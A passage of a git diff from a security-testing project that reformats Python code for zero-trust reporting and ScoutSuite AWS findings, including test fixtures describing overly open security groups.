-from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators.vpc_rule_path_creator import (
+from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building\
+ .rule_path_creators.vpc_rule_path_creator import (
VPCRulePathCreator,
)
diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/test_rule_parser.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/test_rule_parser.py
index 15a0b4b11..c7e18e218 100644
--- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/test_rule_parser.py
+++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/test_rule_parser.py
@@ -16,22 +16,23 @@ class ExampleRules(Enum):
ALL_PORTS_OPEN = EC2Rules.SECURITY_GROUP_ALL_PORTS_TO_ALL
EXPECTED_RESULT = {
- "description": "Security Group Opens All Ports to All",
- "path": "ec2.regions.id.vpcs.id.security_groups.id.rules.id.protocols.id.ports.id.cidrs.id.CIDR",
- "level": "danger",
- "display_path": "ec2.regions.id.vpcs.id.security_groups.id",
- "items": [
+ "description":"Security Group Opens All Ports to All",
+ "path":"ec2.regions.id.vpcs.id.security_groups.id.rules.id.protocols.id.ports.id"
+ ".cidrs.id.CIDR",
+ "level":"danger",
+ "display_path":"ec2.regions.id.vpcs.id.security_groups.id",
+ "items":[
"ec2.regions.ap-northeast-1.vpcs.vpc-abc.security_groups."
"sg-abc.rules.ingress.protocols.ALL.ports.1-65535.cidrs.0.CIDR"
],
- "dashboard_name": "Rules",
- "checked_items": 179,
- "flagged_items": 2,
- "service": "EC2",
- "rationale": "It was detected that all ports in the security group are open <...>",
- "remediation": None,
- "compliance": None,
- "references": None,
+ "dashboard_name":"Rules",
+ "checked_items":179,
+ "flagged_items":2,
+ "service":"EC2",
+ "rationale":"It was detected that all ports in the security group are open <...>",
+ "remediation":None,
+ "compliance":None,
+ "references":None,
}
diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/scoutsuite_auth_service.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/scoutsuite_auth_service.py
index 36eae6271..115f7c1ff 100644
--- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/scoutsuite_auth_service.py
+++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/scoutsuite_auth_service.py
@@ -25,14 +25,14 @@ def is_cloud_authentication_setup(provider: CloudProviders) -> Tuple[bool, str]:
def is_aws_keys_setup():
return ConfigService.get_config_value(
- AWS_KEYS_PATH + ["aws_access_key_id"]
+ AWS_KEYS_PATH + ["aws_access_key_id"]
) and ConfigService.get_config_value(AWS_KEYS_PATH + ["aws_secret_access_key"])
def set_aws_keys(access_key_id: str, secret_access_key: str, session_token: str):
if not access_key_id or not secret_access_key:
raise InvalidAWSKeys(
- "Missing some of the following fields: access key ID, secret access key."
+ "Missing some of the following fields: access key ID, secret access key."
)
_set_aws_key("aws_access_key_id", access_key_id)
_set_aws_key("aws_secret_access_key", secret_access_key)
@@ -47,9 +47,9 @@ def _set_aws_key(key_type: str, key_value: str):
def get_aws_keys():
return {
- "access_key_id": _get_aws_key("aws_access_key_id"),
- "secret_access_key": _get_aws_key("aws_secret_access_key"),
- "session_token": _get_aws_key("aws_session_token"),
+ "access_key_id":_get_aws_key("aws_access_key_id"),
+ "secret_access_key":_get_aws_key("aws_secret_access_key"),
+ "session_token":_get_aws_key("aws_session_token"),
}
diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/scoutsuite_zt_finding_service.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/scoutsuite_zt_finding_service.py
index 3d0cf8413..a710a734c 100644
--- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/scoutsuite_zt_finding_service.py
+++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/scoutsuite_zt_finding_service.py
@@ -17,7 +17,7 @@ class ScoutSuiteZTFindingService:
def process_rule(finding: ScoutSuiteFindingMap, rule: ScoutSuiteRule):
existing_findings = ScoutSuiteFinding.objects(test=finding.test)
assert len(existing_findings) < 2, "More than one finding exists for {}".format(
- finding.test
+ finding.test
)
if len(existing_findings) == 0:
@@ -37,9 +37,9 @@ class ScoutSuiteZTFindingService:
def get_finding_status_from_rules(rules: List[ScoutSuiteRule]) -> str:
if len(rules) == 0:
return zero_trust_consts.STATUS_UNEXECUTED
- elif filter(lambda x: ScoutSuiteRuleService.is_rule_dangerous(x), rules):
+ elif filter(lambda x:ScoutSuiteRuleService.is_rule_dangerous(x), rules):
return zero_trust_consts.STATUS_FAILED
- elif filter(lambda x: ScoutSuiteRuleService.is_rule_warning(x), rules):
+ elif filter(lambda x:ScoutSuiteRuleService.is_rule_warning(x), rules):
return zero_trust_consts.STATUS_VERIFY
else:
return zero_trust_consts.STATUS_PASSED
@@ -55,7 +55,7 @@ class ScoutSuiteZTFindingService:
rule_status = ScoutSuiteZTFindingService.get_finding_status_from_rules([rule])
finding_status = finding.status
new_finding_status = ScoutSuiteZTFindingService.get_finding_status_from_rule_status(
- finding_status, rule_status
+ finding_status, rule_status
)
if finding_status != new_finding_status:
finding.status = new_finding_status
@@ -63,18 +63,18 @@ class ScoutSuiteZTFindingService:
@staticmethod
def get_finding_status_from_rule_status(finding_status: str, rule_status: str) -> str:
if (
- finding_status == zero_trust_consts.STATUS_FAILED
- or rule_status == zero_trust_consts.STATUS_FAILED
+ finding_status == zero_trust_consts.STATUS_FAILED
+ or rule_status == zero_trust_consts.STATUS_FAILED
):
return zero_trust_consts.STATUS_FAILED
elif (
- finding_status == zero_trust_consts.STATUS_VERIFY
- or rule_status == zero_trust_consts.STATUS_VERIFY
+ finding_status == zero_trust_consts.STATUS_VERIFY
+ or rule_status == zero_trust_consts.STATUS_VERIFY
):
return zero_trust_consts.STATUS_VERIFY
elif (
- finding_status == zero_trust_consts.STATUS_PASSED
- or rule_status == zero_trust_consts.STATUS_PASSED
+ finding_status == zero_trust_consts.STATUS_PASSED
+ or rule_status == zero_trust_consts.STATUS_PASSED
):
return zero_trust_consts.STATUS_PASSED
else:
diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/test_scoutsuite_auth_service.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/test_scoutsuite_auth_service.py
index 00eae32e7..b7bab62b3 100644
--- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/test_scoutsuite_auth_service.py
+++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/test_scoutsuite_auth_service.py
@@ -31,10 +31,10 @@ def test_is_aws_keys_setup(tmp_path):
initialize_encryptor(tmp_path)
bogus_key_value = get_encryptor().enc("bogus_aws_key")
dpath.util.set(
- ConfigService.default_config, AWS_KEYS_PATH + ["aws_secret_access_key"], bogus_key_value
+ ConfigService.default_config, AWS_KEYS_PATH + ["aws_secret_access_key"], bogus_key_value
)
dpath.util.set(
- ConfigService.default_config, AWS_KEYS_PATH + ["aws_access_key_id"], bogus_key_value
+ ConfigService.default_config, AWS_KEYS_PATH + ["aws_access_key_id"], bogus_key_value
)
assert is_aws_keys_setup()
diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/test_scoutsuite_rule_service.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/test_scoutsuite_rule_service.py
index 04e085eb1..366af1d1d 100644
--- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/test_scoutsuite_rule_service.py
+++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/test_scoutsuite_rule_service.py
@@ -10,25 +10,29 @@ from monkey_island.cc.services.zero_trust.scoutsuite.scoutsuite_rule_service imp
from monkey_island.cc.services.zero_trust.test_common.scoutsuite_finding_data import RULES
example_scoutsuite_data = {
- "checked_items": 179,
- "compliance": None,
- "dashboard_name": "Rules",
- "description": "Security Group Opens All Ports to All",
- "flagged_items": 2,
- "items": [
+ "checked_items":179,
+ "compliance":None,
+ "dashboard_name":"Rules",
+ "description":"Security Group Opens All Ports to All",
+ "flagged_items":2,
+ "items":[
"ec2.regions.eu-central-1.vpcs.vpc-0ee259b1a13c50229.security_groups.sg-035779fe5c293fc72"
".rules.ingress.protocols.ALL.ports.1-65535.cidrs.2.CIDR",
"ec2.regions.eu-central-1.vpcs.vpc-00015526b6695f9aa.security_groups.sg-019eb67135ec81e65"
".rules.ingress.protocols.ALL.ports.1-65535.cidrs.0.CIDR",
],
- "level": "danger",
- "path": "ec2.regions.id.vpcs.id.security_groups.id.rules.id.protocols.id.ports.id.cidrs.id.CIDR",
- "rationale": "It was detected that all ports in the security group are open, and any source IP address"
- " could send traffic to these ports, which creates a wider attack surface for resources "
- "assigned to it. Open ports should be reduced to the minimum needed to correctly",
- "references": [],
- "remediation": None,
- "service": "EC2",
+ "level":"danger",
+ "path":"ec2.regions.id.vpcs.id.security_groups.id.rules.id.protocols.id.ports.id"
+ ".cidrs.id.CIDR",
+ "rationale":"It was detected that all ports in the security group are open, "
+ "and any source IP address"
+ " could send traffic to these ports, which creates a wider attack surface "
+ "for resources "
+ "assigned to it. Open ports should be reduced to the minimum needed to "
+ "correctly",
+ "references":[],
+ "remediation":None,
+ "service":"EC2",
}
diff --git a/monkey/monkey_island/cc/services/zero_trust/test_common/finding_data.py b/monkey/monkey_island/cc/services/zero_trust/test_common/finding_data.py
index 36a8761cb..6bd547208 100644
--- a/monkey/monkey_island/cc/services/zero_trust/test_common/finding_data.py
+++ b/monkey/monkey_island/cc/services/zero_trust/test_common/finding_data.py
@@ -19,7 +19,7 @@ def get_scoutsuite_finding_dto() -> Finding:
scoutsuite_details = get_scoutsuite_details_dto()
scoutsuite_details.save()
return ScoutSuiteFinding(
- test=TEST_SCOUTSUITE_SERVICE_SECURITY, status=STATUS_FAILED, details=scoutsuite_details
+ test=TEST_SCOUTSUITE_SERVICE_SECURITY, status=STATUS_FAILED, details=scoutsuite_details
)
@@ -27,5 +27,5 @@ def get_monkey_finding_dto() -> Finding:
monkey_details = get_monkey_details_dto()
monkey_details.save()
return MonkeyFinding(
- test=TEST_ENDPOINT_SECURITY_EXISTS, status=STATUS_PASSED, details=monkey_details
+ test=TEST_ENDPOINT_SECURITY_EXISTS, status=STATUS_PASSED, details=monkey_details
)
diff --git a/monkey/monkey_island/cc/services/zero_trust/test_common/monkey_finding_data.py b/monkey/monkey_island/cc/services/zero_trust/test_common/monkey_finding_data.py
index 0e5433784..581028d33 100644
--- a/monkey/monkey_island/cc/services/zero_trust/test_common/monkey_finding_data.py
+++ b/monkey/monkey_island/cc/services/zero_trust/test_common/monkey_finding_data.py
@@ -3,25 +3,25 @@ from monkey_island.cc.models.zero_trust.monkey_finding_details import MonkeyFind
EVENTS = [
{
- "timestamp": "2021-01-20T15:40:28.357Z",
- "title": "Process list",
- "message": "Monkey on pc-24 scanned the process list",
- "event_type": "monkey_local",
+ "timestamp":"2021-01-20T15:40:28.357Z",
+ "title":"Process list",
+ "message":"Monkey on pc-24 scanned the process list",
+ "event_type":"monkey_local",
},
{
- "timestamp": "2021-01-20T16:08:29.519Z",
- "title": "Process list",
- "message": "",
- "event_type": "monkey_local",
+ "timestamp":"2021-01-20T16:08:29.519Z",
+ "title":"Process list",
+ "message":"",
+ "event_type":"monkey_local",
},
]
EVENTS_DTO = [
Event(
- timestamp=event["timestamp"],
- title=event["title"],
- message=event["message"],
- event_type=event["event_type"],
+ timestamp=event["timestamp"],
+ title=event["title"],
+ message=event["message"],
+ event_type=event["event_type"],
)
for event in EVENTS
]
diff --git a/monkey/monkey_island/cc/services/zero_trust/test_common/raw_scoutsute_data.py b/monkey/monkey_island/cc/services/zero_trust/test_common/raw_scoutsute_data.py
index 978209671..fc8bf2b9d 100644
--- a/monkey/monkey_island/cc/services/zero_trust/test_common/raw_scoutsute_data.py
+++ b/monkey/monkey_island/cc/services/zero_trust/test_common/raw_scoutsute_data.py
@@ -1,143 +1,144 @@
# This is what our codebase receives after running ScoutSuite module.
# Object '...': {'...': '...'} represents continuation of similar objects as above
RAW_SCOUTSUITE_DATA = {
- "sg_map": {
- "sg-abc": {"region": "ap-northeast-1", "vpc_id": "vpc-abc"},
- "sg-abcd": {"region": "ap-northeast-2", "vpc_id": "vpc-abc"},
- "...": {"...": "..."},
+ "sg_map":{
+ "sg-abc":{"region":"ap-northeast-1", "vpc_id":"vpc-abc"},
+ "sg-abcd":{"region":"ap-northeast-2", "vpc_id":"vpc-abc"},
+ "...":{"...":"..."},
},
- "subnet_map": {
- "subnet-abc": {"region": "ap-northeast-1", "vpc_id": "vpc-abc"},
- "subnet-abcd": {"region": "ap-northeast-1", "vpc_id": "vpc-abc"},
- "...": {"...": "..."},
+ "subnet_map":{
+ "subnet-abc":{"region":"ap-northeast-1", "vpc_id":"vpc-abc"},
+ "subnet-abcd":{"region":"ap-northeast-1", "vpc_id":"vpc-abc"},
+ "...":{"...":"..."},
},
- "provider_code": "aws",
- "provider_name": "Amazon Web Services",
- "environment": None,
- "result_format": "json",
- "partition": "aws",
- "account_id": "125686982355",
- "last_run": {
- "time": "2021-02-05 16:03:04+0200",
- "run_parameters": {
- "services": [],
- "skipped_services": [],
- "regions": [],
- "excluded_regions": [],
+ "provider_code":"aws",
+ "provider_name":"Amazon Web Services",
+ "environment":None,
+ "result_format":"json",
+ "partition":"aws",
+ "account_id":"125686982355",
+ "last_run":{
+ "time":"2021-02-05 16:03:04+0200",
+ "run_parameters":{
+ "services":[],
+ "skipped_services":[],
+ "regions":[],
+ "excluded_regions":[],
},
- "version": "5.10.0",
- "ruleset_name": "default",
- "ruleset_about": "This ruleset",
- "summary": {
- "ec2": {
- "checked_items": 3747,
- "flagged_items": 262,
- "max_level": "warning",
- "rules_count": 28,
- "resources_count": 176,
+ "version":"5.10.0",
+ "ruleset_name":"default",
+ "ruleset_about":"This ruleset",
+ "summary":{
+ "ec2":{
+ "checked_items":3747,
+ "flagged_items":262,
+ "max_level":"warning",
+ "rules_count":28,
+ "resources_count":176,
},
- "s3": {
- "checked_items": 88,
- "flagged_items": 25,
- "max_level": "danger",
- "rules_count": 18,
- "resources_count": 5,
+ "s3":{
+ "checked_items":88,
+ "flagged_items":25,
+ "max_level":"danger",
+ "rules_count":18,
+ "resources_count":5,
},
- "...": {"...": "..."},
+ "...":{"...":"..."},
},
},
- "metadata": {
- "compute": {
- "summaries": {
- "external attack surface": {
- "cols": 1,
- "path": "service_groups.compute.summaries.external_attack_surface",
- "callbacks": [["merge", {"attribute": "external_attack_surface"}]],
+ "metadata":{
+ "compute":{
+ "summaries":{
+ "external attack surface":{
+ "cols":1,
+ "path":"service_groups.compute.summaries.external_attack_surface",
+ "callbacks":[["merge", {"attribute":"external_attack_surface"}]],
}
},
- "...": {"...": "..."},
+ "...":{"...":"..."},
},
- "...": {"...": "..."},
+ "...":{"...":"..."},
},
# This is the important part, which we parse to get resources
- "services": {
- "ec2": {
- "regions": {
- "ap-northeast-1": {
- "vpcs": {
- "vpc-abc": {
- "id": "vpc-abc",
- "security_groups": {
- "sg-abc": {
- "name": "default",
- "rules": {
- "ingress": {
- "protocols": {
- "ALL": {
- "ports": {
- "1-65535": {
- "cidrs": [{"CIDR": "0.0.0.0/0"}]
+ "services":{
+ "ec2":{
+ "regions":{
+ "ap-northeast-1":{
+ "vpcs":{
+ "vpc-abc":{
+ "id":"vpc-abc",
+ "security_groups":{
+ "sg-abc":{
+ "name":"default",
+ "rules":{
+ "ingress":{
+ "protocols":{
+ "ALL":{
+ "ports":{
+ "1-65535":{
+ "cidrs":[{"CIDR":"0.0.0.0/0"}]
}
}
}
},
- "count": 1,
+ "count":1,
},
- "egress": {
- "protocols": {
- "ALL": {
- "ports": {
- "1-65535": {
- "cidrs": [{"CIDR": "0.0.0.0/0"}]
+ "egress":{
+ "protocols":{
+ "ALL":{
+ "ports":{
+ "1-65535":{
+ "cidrs":[{"CIDR":"0.0.0.0/0"}]
}
}
}
},
- "count": 1,
+ "count":1,
},
},
}
},
}
},
- "...": {"...": "..."},
+ "...":{"...":"..."},
}
},
# Interesting info, maybe could be used somewhere in the report
- "external_attack_surface": {
- "52.52.52.52": {
- "protocols": {"TCP": {"ports": {"22": {"cidrs": [{"CIDR": "0.0.0.0/0"}]}}}},
- "InstanceName": "InstanceName",
- "PublicDnsName": "ec2-52-52-52-52.eu-central-1.compute.amazonaws.com",
+ "external_attack_surface":{
+ "52.52.52.52":{
+ "protocols":{"TCP":{"ports":{"22":{"cidrs":[{"CIDR":"0.0.0.0/0"}]}}}},
+ "InstanceName":"InstanceName",
+ "PublicDnsName":"ec2-52-52-52-52.eu-central-1.compute.amazonaws.com",
}
},
# We parse these into ScoutSuite security rules
- "findings": {
- "ec2-security-group-opens-all-ports-to-all": {
- "description": "Security Group Opens All Ports to All",
- "path": "ec2.regions.id.vpcs.id.security_groups"
- ".id.rules.id.protocols.id.ports.id.cidrs.id.CIDR",
- "level": "danger",
- "display_path": "ec2.regions.id.vpcs.id.security_groups.id",
- "items": [
+ "findings":{
+ "ec2-security-group-opens-all-ports-to-all":{
+ "description":"Security Group Opens All Ports to All",
+ "path":"ec2.regions.id.vpcs.id.security_groups"
+ ".id.rules.id.protocols.id.ports.id.cidrs.id.CIDR",
+ "level":"danger",
+ "display_path":"ec2.regions.id.vpcs.id.security_groups.id",
+ "items":[
"ec2.regions.ap-northeast-1.vpcs.vpc-abc.security_groups"
".sg-abc.rules.ingress.protocols.ALL.ports.1-65535.cidrs.0.CIDR"
],
- "dashboard_name": "Rules",
- "checked_items": 179,
- "flagged_items": 2,
- "service": "EC2",
- "rationale": "It was detected that all ports in the security group are open <...>",
- "remediation": None,
- "compliance": None,
- "references": None,
+ "dashboard_name":"Rules",
+ "checked_items":179,
+ "flagged_items":2,
+ "service":"EC2",
+ "rationale":"It was detected that all ports in the security group are "
+ "open <...>",
+ "remediation":None,
+ "compliance":None,
+ "references":None,
},
- "...": {"...": "..."},
+ "...":{"...":"..."},
},
},
- "...": {"...": "..."},
+ "...":{"...":"..."},
},
- "service_list": [
+ "service_list":[
"acm",
"awslambda",
"cloudformation",
@@ -164,5 +165,5 @@ RAW_SCOUTSUITE_DATA = {
"vpc",
"secretsmanager",
],
- "service_groups": {"...": {"...": "..."}},
+ "service_groups":{"...":{"...":"..."}},
}
diff --git a/monkey/monkey_island/cc/services/zero_trust/test_common/scoutsuite_finding_data.py b/monkey/monkey_island/cc/services/zero_trust/test_common/scoutsuite_finding_data.py
index 4e428794d..c608217e1 100644
--- a/monkey/monkey_island/cc/services/zero_trust/test_common/scoutsuite_finding_data.py
+++ b/monkey/monkey_island/cc/services/zero_trust/test_common/scoutsuite_finding_data.py
@@ -9,63 +9,81 @@ SCOUTSUITE_FINDINGS = [PermissiveFirewallRules, UnencryptedData]
RULES = [
ScoutSuiteRule(
- checked_items=179,
- compliance=None,
- dashboard_name="Rules",
- description="Security Group Opens All Ports to All",
- flagged_items=2,
- items=[
- "ec2.regions.eu-central-1.vpcs.vpc-0ee259b1a13c50229.security_groups.sg-035779fe5c293fc72"
- ".rules.ingress.protocols.ALL.ports.1-65535.cidrs.2.CIDR",
- "ec2.regions.eu-central-1.vpcs.vpc-00015526b6695f9aa.security_groups.sg-019eb67135ec81e65"
- ".rules.ingress.protocols.ALL.ports.1-65535.cidrs.0.CIDR",
- ],
- level="danger",
- path="ec2.regions.id.vpcs.id.security_groups.id.rules.id.protocols.id.ports.id.cidrs.id.CIDR",
- rationale="It was detected that all ports in the security group are open, and any source IP address"
- " could send traffic to these ports, which creates a wider attack surface for resources "
- "assigned to it. Open ports should be reduced to the minimum needed to correctly",
- references=[],
- remediation=None,
- service="EC2",
+ checked_items=179,
+ compliance=None,
+ dashboard_name="Rules",
+ description="Security Group Opens All Ports to All",
+ flagged_items=2,
+ items=[
+ "ec2.regions.eu-central-1.vpcs.vpc-0ee259b1a13c50229.security_groups.sg"
+ "-035779fe5c293fc72"
+ ".rules.ingress.protocols.ALL.ports.1-65535.cidrs.2.CIDR",
+ "ec2.regions.eu-central-1.vpcs.vpc-00015526b6695f9aa.security_groups.sg"
+ "-019eb67135ec81e65"
+ ".rules.ingress.protocols.ALL.ports.1-65535.cidrs.0.CIDR",
+ ],
+ level="danger",
+ path="ec2.regions.id.vpcs.id.security_groups.id.rules.id.protocols.id.ports.id.cidrs"
+ ".id.CIDR",
+ rationale="It was detected that all ports in the security group are open, "
+ "and any source IP address"
+ " could send traffic to these ports, which creates a wider attack surface "
+ "for resources "
+ "assigned to it. Open ports should be reduced to the minimum needed to "
+ "correctly",
+ references=[],
+ remediation=None,
+ service="EC2",
),
ScoutSuiteRule(
- checked_items=179,
- compliance=[
- {"name": "CIS Amazon Web Services Foundations", "version": "1.0.0", "reference": "4.1"},
- {"name": "CIS Amazon Web Services Foundations", "version": "1.0.0", "reference": "4.2"},
- {"name": "CIS Amazon Web Services Foundations", "version": "1.1.0", "reference": "4.1"},
- {"name": "CIS Amazon Web Services Foundations", "version": "1.1.0", "reference": "4.2"},
- {"name": "CIS Amazon Web Services Foundations", "version": "1.2.0", "reference": "4.1"},
- {"name": "CIS Amazon Web Services Foundations", "version": "1.2.0", "reference": "4.2"},
- ],
- dashboard_name="Rules",
- description="Security Group Opens RDP Port to All",
- flagged_items=7,
- items=[
- "ec2.regions.eu-central-1.vpcs.vpc-076500a2138ee09da.security_groups.sg-00bdef5951797199c"
- ".rules.ingress.protocols.TCP.ports.3389.cidrs.0.CIDR",
- "ec2.regions.eu-central-1.vpcs.vpc-d33026b8.security_groups.sg-007931ba8a364e330"
- ".rules.ingress.protocols.TCP.ports.3389.cidrs.0.CIDR",
- "ec2.regions.eu-central-1.vpcs.vpc-d33026b8.security_groups.sg-05014daf996b042dd"
- ".rules.ingress.protocols.TCP.ports.3389.cidrs.0.CIDR",
- "ec2.regions.eu-central-1.vpcs.vpc-d33026b8.security_groups.sg-0c745fe56c66335b2"
- ".rules.ingress.protocols.TCP.ports.3389.cidrs.0.CIDR",
- "ec2.regions.eu-central-1.vpcs.vpc-d33026b8.security_groups.sg-0f99b85cfad63d1b1"
- ".rules.ingress.protocols.TCP.ports.3389.cidrs.0.CIDR",
- "ec2.regions.us-east-1.vpcs.vpc-9e56cae4.security_groups.sg-0dc253aa79062835a"
- ".rules.ingress.protocols.TCP.ports.3389.cidrs.0.CIDR",
- "ec2.regions.us-east-1.vpcs.vpc-002d543353cd4e97d.security_groups.sg-01902f153d4f938da"
- ".rules.ingress.protocols.TCP.ports.3389.cidrs.0.CIDR",
- ],
- level="danger",
- path="ec2.regions.id.vpcs.id.security_groups.id.rules.id.protocols.id.ports.id.cidrs.id.CIDR",
- rationale="The security group was found to be exposing a well-known port to all source addresses."
- " Well-known ports are commonly probed by automated scanning tools, and could be an indicator "
- "of sensitive services exposed to Internet. If such services need to be expos",
- references=[],
- remediation="Remove the inbound rules that expose open ports",
- service="EC2",
+ checked_items=179,
+ compliance=[
+ {"name":"CIS Amazon Web Services Foundations", "version":"1.0.0",
+ "reference":"4.1"},
+ {"name":"CIS Amazon Web Services Foundations", "version":"1.0.0",
+ "reference":"4.2"},
+ {"name":"CIS Amazon Web Services Foundations", "version":"1.1.0",
+ "reference":"4.1"},
+ {"name":"CIS Amazon Web Services Foundations", "version":"1.1.0",
+ "reference":"4.2"},
+ {"name":"CIS Amazon Web Services Foundations", "version":"1.2.0",
+ "reference":"4.1"},
+ {"name":"CIS Amazon Web Services Foundations", "version":"1.2.0",
+ "reference":"4.2"},
+ ],
+ dashboard_name="Rules",
+ description="Security Group Opens RDP Port to All",
+ flagged_items=7,
+ items=[
+ "ec2.regions.eu-central-1.vpcs.vpc-076500a2138ee09da.security_groups.sg"
+ "-00bdef5951797199c"
+ ".rules.ingress.protocols.TCP.ports.3389.cidrs.0.CIDR",
+ "ec2.regions.eu-central-1.vpcs.vpc-d33026b8.security_groups.sg-007931ba8a364e330"
+ ".rules.ingress.protocols.TCP.ports.3389.cidrs.0.CIDR",
+ "ec2.regions.eu-central-1.vpcs.vpc-d33026b8.security_groups.sg-05014daf996b042dd"
+ ".rules.ingress.protocols.TCP.ports.3389.cidrs.0.CIDR",
+ "ec2.regions.eu-central-1.vpcs.vpc-d33026b8.security_groups.sg-0c745fe56c66335b2"
+ ".rules.ingress.protocols.TCP.ports.3389.cidrs.0.CIDR",
+ "ec2.regions.eu-central-1.vpcs.vpc-d33026b8.security_groups.sg-0f99b85cfad63d1b1"
+ ".rules.ingress.protocols.TCP.ports.3389.cidrs.0.CIDR",
+ "ec2.regions.us-east-1.vpcs.vpc-9e56cae4.security_groups.sg-0dc253aa79062835a"
+ ".rules.ingress.protocols.TCP.ports.3389.cidrs.0.CIDR",
+ "ec2.regions.us-east-1.vpcs.vpc-002d543353cd4e97d.security_groups.sg"
+ "-01902f153d4f938da"
+ ".rules.ingress.protocols.TCP.ports.3389.cidrs.0.CIDR",
+ ],
+ level="danger",
+ path="ec2.regions.id.vpcs.id.security_groups.id.rules.id.protocols.id.ports.id.cidrs"
+ ".id.CIDR",
+ rationale="The security group was found to be exposing a well-known port to all "
+ "source addresses."
+ " Well-known ports are commonly probed by automated scanning tools, "
+ "and could be an indicator "
+ "of sensitive services exposed to Internet. If such services need to be "
+ "expos",
+ references=[],
+ remediation="Remove the inbound rules that expose open ports",
+ service="EC2",
),
]
diff --git a/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/finding_service.py b/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/finding_service.py
index cf65819df..315420fb3 100644
--- a/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/finding_service.py
+++ b/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/finding_service.py
@@ -42,12 +42,13 @@ class FindingService:
def _get_enriched_finding(finding: Finding) -> EnrichedFinding:
test_info = zero_trust_consts.TESTS_MAP[finding["test"]]
enriched_finding = EnrichedFinding(
- finding_id=str(finding["_id"]),
- test=test_info[zero_trust_consts.FINDING_EXPLANATION_BY_STATUS_KEY][finding["status"]],
- test_key=finding["test"],
- pillars=test_info[zero_trust_consts.PILLARS_KEY],
- status=finding["status"],
- details=None,
+ finding_id=str(finding["_id"]),
+ test=test_info[zero_trust_consts.FINDING_EXPLANATION_BY_STATUS_KEY][
+ finding["status"]],
+ test_key=finding["test"],
+ pillars=test_info[zero_trust_consts.PILLARS_KEY],
+ status=finding["status"],
+ details=None,
)
return enriched_finding
diff --git a/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/pillar_service.py b/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/pillar_service.py
index fda738c45..6c7b9f00f 100644
--- a/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/pillar_service.py
+++ b/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/pillar_service.py
@@ -6,9 +6,9 @@ class PillarService:
@staticmethod
def get_pillar_report_data():
return {
- "statusesToPillars": PillarService._get_statuses_to_pillars(),
- "pillarsToStatuses": PillarService._get_pillars_to_statuses(),
- "grades": PillarService._get_pillars_grades(),
+ "statusesToPillars":PillarService._get_statuses_to_pillars(),
+ "pillarsToStatuses":PillarService._get_pillars_to_statuses(),
+ "grades":PillarService._get_pillars_grades(),
}
@staticmethod
@@ -22,11 +22,11 @@ class PillarService:
@staticmethod
def __get_pillar_grade(pillar, all_findings):
pillar_grade = {
- "pillar": pillar,
- zero_trust_consts.STATUS_FAILED: 0,
- zero_trust_consts.STATUS_VERIFY: 0,
- zero_trust_consts.STATUS_PASSED: 0,
- zero_trust_consts.STATUS_UNEXECUTED: 0,
+ "pillar":pillar,
+ zero_trust_consts.STATUS_FAILED:0,
+ zero_trust_consts.STATUS_VERIFY:0,
+ zero_trust_consts.STATUS_PASSED:0,
+ zero_trust_consts.STATUS_UNEXECUTED:0,
}
tests_of_this_pillar = zero_trust_consts.PILLARS_TO_TESTS[pillar]
@@ -42,7 +42,7 @@ class PillarService:
pillar_grade[finding.status] += 1
pillar_grade[zero_trust_consts.STATUS_UNEXECUTED] = list(test_unexecuted.values()).count(
- True
+ True
)
return pillar_grade
@@ -50,10 +50,10 @@ class PillarService:
@staticmethod
def _get_statuses_to_pillars():
results = {
- zero_trust_consts.STATUS_FAILED: [],
- zero_trust_consts.STATUS_VERIFY: [],
- zero_trust_consts.STATUS_PASSED: [],
- zero_trust_consts.STATUS_UNEXECUTED: [],
+ zero_trust_consts.STATUS_FAILED:[],
+ zero_trust_consts.STATUS_VERIFY:[],
+ zero_trust_consts.STATUS_PASSED:[],
+ zero_trust_consts.STATUS_UNEXECUTED:[],
}
for pillar in zero_trust_consts.PILLARS:
results[PillarService.__get_status_of_single_pillar(pillar)].append(pillar)
diff --git a/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/principle_service.py b/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/principle_service.py
index 671d1da44..2786c2000 100644
--- a/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/principle_service.py
+++ b/monkey/monkey_island/cc/services/zero_trust/zero_trust_report/principle_service.py
@@ -14,11 +14,11 @@ class PrincipleService:
for principle, principle_tests in list(zero_trust_consts.PRINCIPLES_TO_TESTS.items()):
for pillar in zero_trust_consts.PRINCIPLES_TO_PILLARS[principle]:
all_principles_statuses[pillar].append(
- {
- "principle": zero_trust_consts.PRINCIPLES[principle],
- "tests": PrincipleService.__get_tests_status(principle_tests),
- "status": PrincipleService.__get_principle_status(principle_tests),
- }
+ {
+ "principle":zero_trust_consts.PRINCIPLES[principle],
+ "tests":PrincipleService.__get_tests_status(principle_tests),
+ "status":PrincipleService.__get_principle_status(principle_tests),
+ }
)
return all_principles_statuses
@@ -32,7 +32,7 @@ class PrincipleService:
for status in all_statuses:
if zero_trust_consts.ORDERED_TEST_STATUSES.index(
- status
+ status
